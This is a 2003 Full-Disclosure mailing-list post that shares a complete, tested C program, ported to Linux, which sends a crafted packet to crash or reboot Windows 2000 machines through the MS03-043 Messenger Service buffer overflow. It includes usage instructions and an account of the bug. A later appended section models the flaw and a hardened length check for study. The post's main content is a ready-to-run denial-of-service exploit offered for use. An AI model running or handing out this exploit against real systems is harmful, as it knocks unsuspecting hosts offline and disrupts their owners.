[Full-Disclosure] Linux Ported Version of MS03-043 DOS

From: VeNoMouS (venom_at_gen-x.co.nz)
To: <full-disclosure@lists.netsys.com>
Date: Mon, 20 Oct 2003 14:33:03 +1300

Here you go guys, or get it via www.gen-x.co.nz/ms03-043.c

<<<<<<<<<<<<<<<<<< SNIP >>>>>>>>>>>>>>>>>>>>>>>>

/*
Mon Oct 20 14:26:55 NZDT 2003

Rewritten by VeNoMouS to port it to Linux and tidy it up a little.
This was only like a 5 minute port, but it works and has been tested.
venom@gen-x.co.nz

greets to str0ke and defy

DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not
properly validate the length of a message before passing it to the allocated
buffer" according to the MS bulletin. Digging into it a bit more, we find that when
a character 0x14 is encountered in the 'body' part of the message, it is
replaced by a CR+LF. The buffer allocated for this operation is twice the size
of the string, which is the way to go, but it is then copied to a buffer which
was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks
and overflow the fixed size buffer.

Credits go to LSD :)

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

// Packet format found thanks to a bit of sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

static unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

// Store a 32-bit value (host byte order) without an unaligned / aliasing cast
static void put_u32(unsigned char *p, unsigned int v)
{
    memcpy(p, &v, sizeof(v));
}

int usage(char *name)
{
    printf("Proof of Concept for Windows Messenger Service Overflow..\n");
    printf("- Originally By Hanabishi Recca - recca@mail.ru\n\n");
    printf("- Ported to linux by VeNoMouS..\n");
    printf("- venom@gen-x.co.nz\n\n\n");

    printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n", name);
    printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n");
    printf("-s <src netbios name>\n");
    return 1;
}

int main(int argc, char *argv[])
{
    int i, c, packet_size, fields_size, max_body, s;
    unsigned char packet[8192];
    struct sockaddr_in addr;
    char from[57] = {0}, machine[57] = {0};   // zeroed so the strlen() checks below are defined
    char body[4096] = "*** MESSAGE ***";

    memset(&addr, 0, sizeof(addr));

    if (argc <= 2) {
        usage(argv[0]);
        exit(0);
    }

    while ((c = getopt(argc, argv, "d:i:s:h")) != -1) {
        switch (c) {
        case 'd':
            strncpy(machine, optarg, sizeof(machine) - 1);   // leaves the terminating NUL in place
            printf("Machine is %s\n", machine);
            break;
        case 'i':
            addr.sin_family = AF_INET;
            addr.sin_addr.s_addr = inet_addr(optarg);
            addr.sin_port = htons(135);
            break;
        case 's':
            strncpy(from, optarg, sizeof(from) - 1);
            break;
        case 'h':
        default:
            usage(argv[0]);
            exit(0);
        }
    }

    // A few conditions :
    // 0 <= strlen(from) + strlen(machine) <= 56
    // max fields size 3992

    if (!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(1); }

    if (!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(1); }

    if (!strlen(from)) strcpy(from, "tolazytotype");

    memset(packet, 0, sizeof(packet));
    packet_size = 0;

    memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
    packet_size += sizeof(packet_header) - 1;

    // 'from' field: 12-byte field header, then the NUL-terminated string padded to a multiple of 4
    i = strlen(from) + 1;
    put_u32(&field_header[0], i);
    put_u32(&field_header[8], i);
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    memcpy(&packet[packet_size], from, i);
    packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

    // 'machine' field: same layout
    i = strlen(machine) + 1;
    put_u32(&field_header[0], i);
    put_u32(&field_header[8], i);
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    memcpy(&packet[packet_size], machine, i);
    packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

    // 'body' field: fill whatever is left of the 3992-byte field budget with 0x14,
    // the byte the service expands to CR+LF
    max_body = 3992 - packet_size + (int)sizeof(packet_header) - (int)sizeof(field_header);
    fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", max_body);
    memset(body, 0x14, sizeof(body));
    body[max_body - 1] = '\0';

    i = strlen(body) + 1;
    put_u32(&field_header[0], i);
    put_u32(&field_header[8], i);
    memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
    packet_size += sizeof(field_header) - 1;
    memcpy(&packet[packet_size], body, i);
    packet_size += i;

    fields_size = packet_size - (sizeof(packet_header) - 1);
    put_u32(&packet[40], (unsigned int)time(NULL));
    put_u32(&packet[74], fields_size);

    fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n",
            (int)(strlen(from) + strlen(machine) + strlen(body)), packet_size, fields_size);

    if ((s = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
        perror("Error socket() - ");
        exit(1);
    }

    if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("Error sendto() - ");
        exit(1);
    }

    close(s);
    return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
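The mechanism the post's comment describes (a raw-length check, a 0x14 -> CR+LF rewrite into a buffer of twice the input size, then a copy into a fixed 11CAh-byte buffer) is worth seeing in isolation. The following is an added example written for this page; it is not code from the post, from the original PoC author, or from Microsoft, and it does not talk to any service. It models the flawed sequence next to a hardened check that bounds the expanded length instead of the received length. The constants MSGR_FIXED_BUF (0x11CA, from the post) and MSGR_RAW_LIMIT (3992, the "max fields size" figure the PoC quotes, here assumed to be the ceiling applied to the body) and all function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed-size destination buffer named in the post's analysis (11CAh bytes). */
#define MSGR_FIXED_BUF 0x11CA
/* Raw-length ceiling the service is described as checking. 3992 is the "max
 * fields size" the PoC's comment quotes; assumption: it is applied to the body. */
#define MSGR_RAW_LIMIT 3992

/* Size of `body` once every 0x14 byte has been rewritten as CR+LF. */
size_t expanded_len(const unsigned char *body, size_t len)
{
    size_t out = 0;
    for (size_t i = 0; i < len; i++)
        out += (body[i] == 0x14) ? 2 : 1;
    return out;
}

/* Rewrite 0x14 -> "\r\n" into dst, never writing more than cap bytes.
 * Returns the number of bytes the full expansion needs, so a caller can
 * detect truncation by comparing the result against cap. */
size_t expand_body(const unsigned char *body, size_t len,
                   unsigned char *dst, size_t cap)
{
    size_t out = 0;
    for (size_t i = 0; i < len; i++) {
        if (body[i] == 0x14) {
            if (out + 2 <= cap) { dst[out] = '\r'; dst[out + 1] = '\n'; }
            out += 2;
        } else {
            if (out + 1 <= cap) dst[out] = body[i];
            out += 1;
        }
    }
    return out;
}

/* Models the flawed sequence from the post: the length check looks only at
 * the raw body, the expansion goes into a heap buffer of 2*len (large enough),
 * and the result is then copied into a MSGR_FIXED_BUF-byte buffer. Returns how
 * many bytes would land past the end of that fixed buffer (0 = no overflow),
 * or 0 when the raw check rejects the message. Nothing is actually overrun. */
size_t vulnerable_spill(const unsigned char *body, size_t len)
{
    if (len > MSGR_RAW_LIMIT)
        return 0;                                /* rejected before expansion */
    unsigned char *tmp = malloc(len * 2 + 1);    /* the "twice the size" buffer */
    if (!tmp)
        return 0;
    size_t need = expand_body(body, len, tmp, len * 2);   /* always fits here */
    free(tmp);
    /* memcpy(fixed, tmp, need) would be the overflowing step; report it instead. */
    return need > MSGR_FIXED_BUF ? need - MSGR_FIXED_BUF : 0;
}

/* Hardened check: bound what will be written, not what was received. */
int hardened_accepts(const unsigned char *body, size_t len)
{
    return len <= MSGR_RAW_LIMIT && expanded_len(body, len) <= MSGR_FIXED_BUF;
}

int main(void)
{
    /* Constructed input: 3923 bytes of 0x14, which is the body the PoC above
     * emits for a 12-byte source name and a 13-byte destination name. */
    unsigned char body[3923];
    memset(body, 0x14, sizeof body);

    printf("raw length %zu passes the %d-byte check: %s\n",
           sizeof body, MSGR_RAW_LIMIT,
           sizeof body <= MSGR_RAW_LIMIT ? "yes" : "no");
    printf("expanded length %zu vs fixed buffer %d -> %zu bytes spill\n",
           expanded_len(body, sizeof body), MSGR_FIXED_BUF,
           vulnerable_spill(body, sizeof body));
    printf("hardened check accepts it: %s\n",
           hardened_accepts(body, sizeof body) ? "yes" : "no");
    return 0;
}
```

The point the numbers make: a 3923-byte body clears the raw-length check, expands to 7846 bytes, and would run 3292 bytes past a 0x11CA-byte destination. The same body with no 0x14 bytes expands to itself and is accepted by both checks, which is why a check on the received length alone looks correct until the expansion ratio is accounted for.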

